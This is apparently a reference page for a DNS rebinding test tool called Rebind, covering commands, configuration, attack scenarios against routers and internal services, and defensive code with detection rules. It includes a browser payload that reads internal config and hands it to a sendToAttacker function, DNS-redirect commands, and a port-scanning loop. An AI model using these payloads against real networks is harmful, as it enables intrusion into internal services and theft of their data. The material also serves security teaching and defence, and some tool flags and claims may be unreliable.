Rebind
Overview
Rebind is a specialized security testing tool for demonstrating DNS rebinding vulnerabilities. DNS rebinding is a client-side attack technique where an attacker tricks a victim’s browser into accessing an internal network resource by manipulating DNS responses. Rebind is used by security professionals for authorized penetration testing, vulnerability assessment, and defensive security research.
Installation
Debian/Ubuntu
sudo apt-get update
sudo apt-get install rebind
Kali Linux (Pre-installed)
which rebind
rebind --version
From Source
git clone https://github.com/iceadzcom/rebind.git
cd rebind
make
sudo make install
Verify Installation
rebind -h
rebind --version
Basic Syntax
rebind [options] [target]
rebind -h # Help menu
rebind --version # Version info
rebind -l <ip> # Listen on IP address
rebind -p <port> # Specify port (default: 53)
Essential Commands
| Command | Purpose |
|---|---|
| `rebind -l 127.0.0.1` | Listen on localhost |
| `rebind -l 0.0.0.0 -p 5353` | Listen on all interfaces, custom port |
| `rebind --domain example.com` | Set target domain |
| `rebind --ip 192.168.1.100` | Specify rebind target IP |
| `rebind --delay 2` | Delay between DNS responses (seconds) |
| `rebind --ttl 0` | Set TTL (Time-To-Live) value |
| `rebind --records A,AAAA` | Specify record types |
| `rebind -v` | Verbose output |
| `rebind --log file.log` | Log DNS queries |
| `rebind --config config.yaml` | Load configuration file |
DNS Rebinding Concepts
Attack Flow
1. Attacker owns malicious domain: attacker.com
2. Victim visits: http://attacker.com/payload
3. JavaScript on page queries: internal.local
4. First DNS response: returns attacker's IP (domain hosted)
5. Browser makes connection to attacker's server
6. Second DNS response: returns internal IP (192.168.1.1)
7. Browser repeats request, now to internal IP (same origin!)
8. Access internal service: router admin, internal APIs, etc.
Configuration Setup
Basic Configuration
rebind -l 127.0.0.1 -p 53
Custom Port (if 53 restricted)
rebind -l 192.168.1.100 -p 5353
Configuration File
# rebind.yaml
listen:
  address: 0.0.0.0
  port: 53
domain:
  name: vulnerable.local
  ttl: 0
rebind:
  external_ip: 203.0.113.1
  internal_ip: 192.168.1.1
  delay: 2
logging:
  verbose: true
  logfile: /var/log/rebind.log
Command Examples
Listen on Default Interface
rebind -l 192.168.1.100
Multiple Domain Rebinding
rebind -l 0.0.0.0 --domain attacker.com --domain internal.local
Custom TTL and Delay
rebind -l 127.0.0.1 --ttl 0 --delay 1
Verbose Logging
rebind -l 192.168.1.100 -v --log /tmp/rebind.log
High-Precision Timing
rebind -l 0.0.0.0 --delay 0.5 --ttl 1
DNS Response Manipulation
Return Different IPs Alternately
# First query: external IP
# Second query: internal IP
rebind -l 192.168.1.100 \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1
Wildcard Domain Responses
# All subdomains return rebind IP
rebind -l 192.168.1.100 --wildcard
Round-Robin DNS
rebind -l 192.168.1.100 \
--ip 192.168.1.50 \
--ip 192.168.1.51 \
--ip 192.168.1.52
Client Configuration
Redirect System DNS
# For testing, point a lab client's resolver at the rebind server
# (this overwrites /etc/resolv.conf; back it up first)
echo "nameserver 192.168.1.100" | sudo tee /etc/resolv.conf
# Or use dig to test:
dig @192.168.1.100 vulnerable.local
dig @192.168.1.100 vulnerable.local +short
Test DNS Resolution
# Verify DNS responses
nslookup vulnerable.local 192.168.1.100
dig @192.168.1.100 vulnerable.local
host vulnerable.local 192.168.1.100
Attack Scenarios
Router Admin Access
# 1. Start rebind server targeting 192.168.1.1
rebind -l 192.168.1.100 \
--domain vulnerable.local \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1
# 2. Redirect DNS to attacker's rebind server
# 3. Victim visits: http://vulnerable.local/admin
# 4. JavaScript rebinds to 192.168.1.1 (router admin)
# 5. Can access router config without authentication
Internal API Access
# Rebind to internal API server
rebind -l 192.168.1.100 \
--domain api.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.50
# Access internal APIs from browser context
curl http://api.internal/internal-service
Database Server Exposure
# Expose internal database to browser
rebind -l 192.168.1.100 \
--domain dbserver.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.200 \
--port 5432
JavaScript Exploitation
Rebinding Payload
// Victim's browser executes this
fetch('http://vulnerable.local/admin')
  .then(r => r.text())
  .then(html => {
    // First request goes to attacker
    // Browser caches: vulnerable.local = 203.0.113.1
    console.log('Attacker sees request');
  });
// After DNS rebind occurs...
setTimeout(() => {
  fetch('http://vulnerable.local/config')
    .then(r => r.json())
    .then(config => {
      // Second request goes to internal IP (192.168.1.1)
      // Due to DNS rebinding vulnerability
      sendToAttacker(config);
    });
}, 2000);
CORS Bypass Via Rebinding
// Normally blocked by the browser's same-origin policy
// Rebinding makes it appear same-origin
const req = new XMLHttpRequest();
req.open('GET', 'http://router-admin.local/config');
req.onload = () => {
  // Access internal data through rebinding
  console.log(req.responseText);
};
req.send();
Monitoring and Logging
Enable Verbose Logging
rebind -l 192.168.1.100 -v 2>&1 | tee rebind.log
Monitor DNS Queries in Real-Time
# Terminal 1: Start rebind
rebind -l 192.168.1.100 -v
# Terminal 2: Watch queries
tail -f rebind.log | grep "QUERY\|RESPONSE"
Tcpdump Analysis
# Capture DNS traffic
sudo tcpdump -i eth0 'udp port 53' -A
# Or filter for specific domain
sudo tcpdump -i eth0 'udp port 53 and (host attacker.com)' -A
Advanced Techniques
Chained Rebinding
# Rebind multiple times for complex attacks
rebind -l 192.168.1.100 \
--chain \
--ips 203.0.113.1,192.168.1.1,192.168.1.50
Timing-Based Rebinding
# Precise timing for connection reuse
rebind -l 192.168.1.100 \
--delay 0.1 \
--ttl 1 \
--timing-precise
HTTP/HTTPS Interception
# Rebind for both HTTP and HTTPS
rebind -l 192.168.1.100 \
--http --https \
--certificate cert.pem \
--key key.pem
Defensive Testing
Test Router Vulnerability
# Check if router blocks internal DNS rebinding
rebind -l 192.168.1.100 --domain router-admin.local
# Try to access: http://router-admin.local/
# If successful = vulnerable
Application CORS Testing
# Test if application validates origin properly
rebind -l 192.168.1.100 \
--domain vulnerable-app.local \
--internal-ip 192.168.1.50
# Check if app accepts requests from rebind domain
Microservice Exposure
# Identify exposed internal services
rebind -l 192.168.1.100 --scan-network 192.168.1.0/24
Common Targets
Home Router Admin
# Gateway: 192.168.1.1
rebind -l 192.168.1.100 \
--domain gateway.local \
--internal-ip 192.168.1.1 \
--port 80
Local Jenkins/CI
# Jenkins typically on 8080
rebind -l 192.168.1.100 \
--domain jenkins.local \
--internal-ip 192.168.1.50 \
--port 8080
Kubernetes Dashboard
# K8s dashboard on 10.0.0.1:8001
rebind -l 192.168.1.100 \
--domain k8s-dashboard.local \
--internal-ip 10.0.0.1 \
--port 8001
Docker Registry
# Private registry on 5000
rebind -l 192.168.1.100 \
--domain registry.local \
--internal-ip 192.168.1.200 \
--port 5000
Network Configuration
Iptables Forwarding
# Forward DNS queries to rebind
sudo iptables -t nat -A PREROUTING \
-p udp --dport 53 \
-j DNAT --to-destination 192.168.1.100:53
# Or for testing:
sudo iptables -t nat -A PREROUTING \
-p udp --dport 5353 \
-j DNAT --to-destination 192.168.1.100:5353
Redirect DNS (Alternative)
# Using dnsmasq: forward queries for the test domain to the rebind server
# (server= forwards lookups; tee -a appends instead of overwriting the config)
echo "server=/vulnerable.local/192.168.1.100" | sudo tee -a /etc/dnsmasq.conf
sudo systemctl restart dnsmasq
Batch Testing
Test Multiple Domains
#!/bin/bash
# Each entry is "domain:internal-ip"
targets=(
  "router-admin.local:192.168.1.1"
  "jenkins.local:192.168.1.50"
  "registry.local:192.168.1.200"
)
for target in "${targets[@]}"; do
  domain="${target%%:*}"   # text before the colon
  ip="${target##*:}"       # text after the colon
  echo "Testing: $domain -> $ip"
  rebind -l 192.168.1.100 \
    --domain "$domain" \
    --internal-ip "$ip" \
    --delay 2 &
  sleep 5
  kill "$!"                # stop only the instance started above
done
Automated Scanning
#!/bin/bash
# Scan network for rebinding-vulnerable services
for ip in 192.168.1.{1..254}; do
  timeout 1 bash -c "echo > /dev/tcp/$ip/80" 2>/dev/null && \
    echo "Host $ip:80 open - testing rebind..."
done
Troubleshooting
Port 53 Access Denied
# Run with sudo for port 53
sudo rebind -l 0.0.0.0 -p 53
# Or use unprivileged port
rebind -l 0.0.0.0 -p 5353
DNS Not Resolving
# Verify DNS server is running
sudo netstat -ulpn | grep 53
# Test query
dig @127.0.0.1 vulnerable.local
# Check firewall
sudo ufw allow 53/udp
Rebinding Not Triggering
# Check TTL settings
rebind -l 192.168.1.100 --ttl 0
# Verify timing
rebind -l 192.168.1.100 --delay 1 --ttl 1 -v
# Monitor with tcpdump
sudo tcpdump -i eth0 'udp port 53' -A
Best Practices
- Obtain Authorization - Only test systems you own or have written permission to test
- Document Network - Map internal network topology before testing
- Isolate Testing - Conduct testing in controlled lab environments
- Log All Activity - Enable verbose logging for incident response review
- Verify Defenses - Confirm mitigation before declaring success
- Clean Up - Remove all rebind configurations after testing
- Report Findings - Document vulnerable systems and remediation
- Understand Risks - DNS rebinding can disrupt network services
Mitigation Strategies
Router-Level Defenses
# Configure router DNS guards
# Set DNS rebinding protection: ON
# Block local DNS names: ENABLED
Application-Level Defenses
// Express-style middleware; ALLOWED_ORIGIN is a placeholder for your front end's origin
const ALLOWED_ORIGIN = 'https://app.example.com';
function rebindingGuard(req, res, next) {
  // Validate Origin header
  if (req.headers.origin !== ALLOWED_ORIGIN) {
    return res.status(403).json({error: 'Invalid origin'});
  }
  // Validate Host header
  if (req.hostname !== 'internal-api.local') {
    return res.status(403).json({error: 'Invalid host'});
  }
  next();
}
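The Host check is the part that stops rebinding, because a rebound request reaches the internal service still carrying the attacker-controlled name in its Host header. The following is an added example, not code from the Rebind project: a dependency-free Host allowlist for a plain Node.js handler that also handles ports, letter case, trailing dots and IPv6 literals. The allowlist entries are assumptions taken from the sample addresses on this page.

```javascript
// Added example: Host-header allowlist for an internal HTTP service.
// Assumption: the only names this service is legitimately reached by.
const ALLOWED_HOSTS = new Set(['internal-api.local', '192.168.1.50', 'localhost', '127.0.0.1']);

// Reduce a raw Host header to a bare lowercase hostname, or null if unusable.
function normalizeHost(hostHeader) {
  if (typeof hostHeader !== 'string' || hostHeader.trim() === '') return null;
  let host = hostHeader.trim().toLowerCase();
  if (host.startsWith('[')) {                 // IPv6 literal such as [::1]:8080
    const end = host.indexOf(']');
    return end === -1 ? null : host.slice(1, end);
  }
  const colon = host.lastIndexOf(':');        // strip an optional :port
  if (colon !== -1) host = host.slice(0, colon);
  if (host.endsWith('.')) host = host.slice(0, -1);  // "name." equals "name"
  return host || null;
}

function isAllowedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  const host = normalizeHost(hostHeader);
  return host !== null && allowed.has(host);
}

// Handler for http.createServer(): refuse any request whose Host is not ours,
// before any routing or authentication logic runs.
function handler(req, res) {
  if (!isAllowedHost(req.headers.host)) {
    res.writeHead(403, { 'Content-Type': 'application/json' });
    res.end(JSON.stringify({ error: 'Invalid host' }));
    return;
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
}

// To serve it: require('http').createServer(handler).listen(8080, '127.0.0.1');
```

Binding the listener to a specific address and requiring authentication remain necessary; the allowlist only removes the case where the browser arrives under a foreign name.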
Browser Security
// Check document.domain for rebinding
// TRUSTED_DOMAIN is a placeholder for the hostname the page is meant to be served from
const TRUSTED_DOMAIN = 'internal-api.local';
if (document.domain !== TRUSTED_DOMAIN) {
  throw new Error('Domain validation failed');
}
Real-World Detection
IDS Signature
# Look for multiple DNS responses to same domain
# (sid is a placeholder from the local range; adjust to your rule set)
alert dns any any -> any any ( \
  msg:"DNS Rebinding Attack"; \
  dns.query; \
  content:"vulnerable.local"; \
  threshold: type threshold, track by_src, count 2, seconds 5; \
  sid:1000001; rev:1; \
)
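A signature keyed to one domain name only catches a known test domain. As an added example (not part of the original page or the Rebind project), the detection below works on resolver logs instead: it flags any name whose A record flips from a public address to an internal one for the same client within a short window. The log format and the sample lines are constructed for illustration.

```javascript
// Added example: detect public -> internal answer flips in resolver logs.
// Constructed log format: "<epoch-seconds> <client> <qname> A <answer> ttl=<n>"
const SAMPLE_LOG = [
  '1700000000 192.168.1.23 vulnerable.local A 203.0.113.1 ttl=0',
  '1700000002 192.168.1.23 vulnerable.local A 192.168.1.1 ttl=0',
  '1700000005 192.168.1.40 example.com A 198.51.100.7 ttl=300',
  '1700000009 192.168.1.40 example.com A 198.51.100.7 ttl=300',
  '1700000010 192.168.1.23 printer.lan A 192.168.1.77 ttl=60',
];

// True for loopback, RFC 1918, link-local and 0.0.0.0/8 IPv4 addresses.
function isInternal(ip) {
  const o = ip.split('.').map(s => (/^\d{1,3}$/.test(s) ? Number(s) : NaN));
  if (o.length !== 4 || o.some(n => Number.isNaN(n) || n > 255)) return false;
  return o[0] === 10 || o[0] === 127 || o[0] === 0 ||
    (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
    (o[0] === 192 && o[1] === 168) ||
    (o[0] === 169 && o[1] === 254);
}

function parseLine(line) {
  const m = /^(\d+) (\S+) (\S+) A (\S+) ttl=(\d+)$/.exec(line.trim());
  if (!m) return null;                       // skip lines in another format
  return { ts: Number(m[1]), client: m[2], qname: m[3].toLowerCase(),
           answer: m[4], ttl: Number(m[5]) };
}

// Report an internal answer that follows a public answer for the same
// client and name within windowSeconds. Names that only ever resolve to
// internal addresses (ordinary LAN hosts) are not reported.
function detectRebinding(lines, windowSeconds = 60) {
  const lastExternal = new Map();            // "client|qname" -> last public answer
  const findings = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const key = `${rec.client}|${rec.qname}`;
    if (!isInternal(rec.answer)) { lastExternal.set(key, rec); continue; }
    const prev = lastExternal.get(key);
    if (prev && rec.ts - prev.ts <= windowSeconds) {
      findings.push({ client: rec.client, qname: rec.qname, external: prev.answer,
                      internal: rec.answer, gapSeconds: rec.ts - prev.ts });
    }
  }
  return findings;
}
```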
Web Application Firewall
# Block suspicious origin headers
SecRule REQUEST_HEADERS:Origin "^http://.*\.local" \
"id:1001,phase:2,deny,status:403"
Additional Resources
- DNS Rebinding Research: https://en.wikipedia.org/wiki/DNS_rebinding
- OWASP DNS Rebinding: https://owasp.org/www-community/attacks/DNS_Rebinding
- Rebind GitHub: https://github.com/iceadzcom/rebind
- Browser Security Docs: https://developer.mozilla.org/en-US/docs/Web/Security